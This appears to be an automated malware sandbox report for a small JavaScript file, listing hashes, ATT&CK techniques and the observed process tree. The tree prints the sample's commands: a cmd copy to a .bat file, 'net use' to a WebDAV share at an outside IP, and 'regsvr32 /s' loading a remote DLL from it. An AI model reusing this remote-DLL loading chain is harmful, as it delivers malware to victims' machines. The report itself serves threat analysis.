49174fbf806fd9fe8c5d507e2bc1e7dffdbd1b5d6fd2bd36ea7f985e3f46a805

Analysis

max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
08/07/2024, 18:51

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

3338144912444529315.js
Size

5KB
MD5

e4e7dccdac84ba3c078f71c5bcb3672f
SHA1

0b0a505afd119d889ebfe89d3812fb632fdbccfe
SHA256

49174fbf806fd9fe8c5d507e2bc1e7dffdbd1b5d6fd2bd36ea7f985e3f46a805
SHA512

18f2ba58aaba9619cbd6f6f99619bf222b886e8da69bd7617eed7d7d82c74dffa51029144cc774d6c89f709f6d99403eb5637983bab97dddb3104eb3ad09ab57
SSDEEP

48:oaVdDh+oso8xmXgErTB1LvssQBGlUUUiPUUBX2EltEdTB1LvssQBGlUUUiPUUAlX:ooDhcxDornLWAHLH6t+dKvmUs7mNhkU8

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2812	regsvr32.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2740 wrote to memory of 2680	2740	wscript.exe	31
PID 2740 wrote to memory of 2680	2740	wscript.exe	31
PID 2740 wrote to memory of 2680	2740	wscript.exe	31
PID 2680 wrote to memory of 772	2680	cmd.exe	33
PID 2680 wrote to memory of 772	2680	cmd.exe	33
PID 2680 wrote to memory of 772	2680	cmd.exe	33
PID 2680 wrote to memory of 2812	2680	cmd.exe	34
PID 2680 wrote to memory of 2812	2680	cmd.exe	34
PID 2680 wrote to memory of 2812	2680	cmd.exe	34
PID 2680 wrote to memory of 2812	2680	cmd.exe	34
PID 2680 wrote to memory of 2812	2680	cmd.exe	34

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\3338144912444529315.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2740
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\3338144912444529315.js" "C:\Users\Admin\\fdnojv.bat" && "C:\Users\Admin\\fdnojv.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2680
- - C:\Windows\system32\net.exe
    net use \\45.9.74.13@8888\DavWWWRoot\
    3⤵
    PID:772
- - C:\Windows\system32\regsvr32.exe
    regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\265.dll
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\fdnojv.bat

Filesize
5KB

MD5
e4e7dccdac84ba3c078f71c5bcb3672f

SHA1
0b0a505afd119d889ebfe89d3812fb632fdbccfe

SHA256
49174fbf806fd9fe8c5d507e2bc1e7dffdbd1b5d6fd2bd36ea7f985e3f46a805

SHA512
18f2ba58aaba9619cbd6f6f99619bf222b886e8da69bd7617eed7d7d82c74dffa51029144cc774d6c89f709f6d99403eb5637983bab97dddb3104eb3ad09ab57

Download Submit